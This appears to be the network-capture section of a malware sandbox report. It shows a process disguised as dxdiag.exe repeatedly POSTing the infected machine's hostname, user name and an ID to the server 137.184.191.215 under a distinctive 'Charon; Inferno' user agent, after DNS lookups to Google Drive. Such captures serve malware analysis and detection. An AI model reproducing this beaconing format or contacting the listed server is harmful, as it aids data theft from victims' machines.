                      Oct 1, 2024 07:45:42.486361027 CEST4973380192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:42.491337061 CEST8049733137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:42.491414070 CEST4973380192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:42.493664980 CEST4973380192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:42.498400927 CEST8049733137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:42.498444080 CEST4973380192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:42.503202915 CEST8049733137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:45.146161079 CEST8049733137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:45.146215916 CEST8049733137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:45.146253109 CEST8049733137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:45.146289110 CEST8049733137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:45.146305084 CEST4973380192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:45.146322966 CEST8049733137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:45.146347046 CEST4973380192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:45.146373987 CEST4973380192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:45.146543980 CEST4973380192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:45.285892010 CEST4973480192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:45.290867090 CEST8049734137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:45.291064024 CEST4973480192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:45.293193102 CEST4973480192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:45.298074007 CEST8049734137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:45.298134089 CEST4973480192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:45.302972078 CEST8049734137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:48.020323038 CEST8049734137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:48.020347118 CEST8049734137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:48.020358086 CEST8049734137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:48.020373106 CEST8049734137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:48.020418882 CEST4973480192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:48.020493031 CEST4973480192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:48.034354925 CEST4973480192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:48.039257050 CEST8049734137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:48.372268915 CEST4973580192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:48.377130032 CEST8049735137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:48.377222061 CEST4973580192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:48.380528927 CEST4973580192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:48.385265112 CEST8049735137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:48.385313988 CEST4973580192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:48.390031099 CEST8049735137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:50.982450962 CEST8049735137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:50.982467890 CEST8049735137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:50.982481003 CEST8049735137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:50.982496023 CEST8049735137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:50.982541084 CEST4973580192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:50.982595921 CEST4973580192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:50.984982967 CEST4973580192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:50.990498066 CEST8049735137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:51.236462116 CEST4973680192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:51.242505074 CEST8049736137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:51.242624044 CEST4973680192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:51.244790077 CEST4973680192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:51.251064062 CEST8049736137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:51.251136065 CEST4973680192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:51.256369114 CEST8049736137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:53.802278996 CEST8049736137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:53.802290916 CEST8049736137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:53.802298069 CEST8049736137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:53.802371979 CEST4973680192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:53.802673101 CEST8049736137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:53.802685022 CEST8049736137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:53.802727938 CEST4973680192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:53.803314924 CEST4973680192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:53.960072041 CEST4973780192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:54.091780901 CEST8049737137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:54.091851950 CEST4973780192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:54.094350100 CEST4973780192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:54.100472927 CEST8049737137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:54.100526094 CEST4973780192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:54.105356932 CEST8049737137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:56.725964069 CEST8049737137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:56.725982904 CEST8049737137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:56.725996017 CEST8049737137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:56.726059914 CEST4973780192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:56.726284981 CEST4973780192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:56.726406097 CEST8049737137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:56.726457119 CEST4973780192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:56.731033087 CEST8049737137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:56.861195087 CEST4973880192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:56.866235971 CEST8049738137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:56.866328955 CEST4973880192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:56.868588924 CEST4973880192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:56.873490095 CEST8049738137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:56.873549938 CEST4973880192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:56.878439903 CEST8049738137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:59.432235956 CEST8049738137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:59.432252884 CEST8049738137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:59.432262897 CEST8049738137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:59.432316065 CEST8049738137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:59.432377100 CEST4973880192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:59.432430029 CEST4973880192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:59.432681084 CEST4973880192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:59.437438011 CEST8049738137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:59.592257977 CEST4973980192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:59.597454071 CEST8049739137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:59.599805117 CEST4973980192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:59.599806070 CEST4973980192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:59.604649067 CEST8049739137.184.191.215192.168.2.7
                      Oct 1, 2024 07:45:59.605782986 CEST4973980192.168.2.7137.184.191.215
                      Oct 1, 2024 07:45:59.610590935 CEST8049739137.184.191.215192.168.2.7
                      Oct 1, 2024 07:46:02.166037083 CEST8049739137.184.191.215192.168.2.7
                      Oct 1, 2024 07:46:02.166054010 CEST8049739137.184.191.215192.168.2.7
                      Oct 1, 2024 07:46:02.166065931 CEST8049739137.184.191.215192.168.2.7
                      Oct 1, 2024 07:46:02.166129112 CEST8049739137.184.191.215192.168.2.7
                      Oct 1, 2024 07:46:02.166162968 CEST4973980192.168.2.7137.184.191.215
                      Oct 1, 2024 07:46:02.166220903 CEST4973980192.168.2.7137.184.191.215
                      Oct 1, 2024 07:46:02.205828905 CEST4973980192.168.2.7137.184.191.215
                      Oct 1, 2024 07:46:02.212137938 CEST8049739137.184.191.215192.168.2.7

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 1, 2024 07:43:50.566521883 CEST6032053192.168.2.71.1.1.1
                      Oct 1, 2024 07:43:50.573956966 CEST53603201.1.1.1192.168.2.7
                      Oct 1, 2024 07:43:51.630407095 CEST6532153192.168.2.71.1.1.1
                      Oct 1, 2024 07:43:51.641024113 CEST53653211.1.1.1192.168.2.7

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Oct 1, 2024 07:43:50.566521883 CEST192.168.2.71.1.1.10x2ec0Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                      Oct 1, 2024 07:43:51.630407095 CEST192.168.2.71.1.1.10xc3f2Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Oct 1, 2024 07:43:50.573956966 CEST1.1.1.1192.168.2.70x2ec0No error (0)drive.google.com142.250.185.142A (IP address)IN (0x0001)false
                      Oct 1, 2024 07:43:51.641024113 CEST1.1.1.1192.168.2.70xc3f2No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • drive.google.com
                      • drive.usercontent.google.com
                      • 137.184.191.215

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.749709137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:44:42.729958057 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 192
                      Connection: close
                      Oct 1, 2024 07:44:42.734822989 CEST192OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: 'ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2CE1i2e
                      Oct 1, 2024 07:44:45.355606079 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:44:43 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:44:45.355626106 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:44:45.355640888 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.749710137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:44:45.425153017 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 192
                      Connection: close
                      Oct 1, 2024 07:44:45.430241108 CEST192OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: 'ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2CyQUy5
                      Oct 1, 2024 07:44:48.265423059 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:44:45 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:44:48.265460968 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:44:48.265472889 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.749711137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:44:48.494666100 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:44:48.499597073 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:44:51.084831953 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:44:49 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:44:51.084856987 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:44:51.084870100 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.749715137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:44:51.242234945 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:44:51.247040987 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:44:53.797022104 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:44:51 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
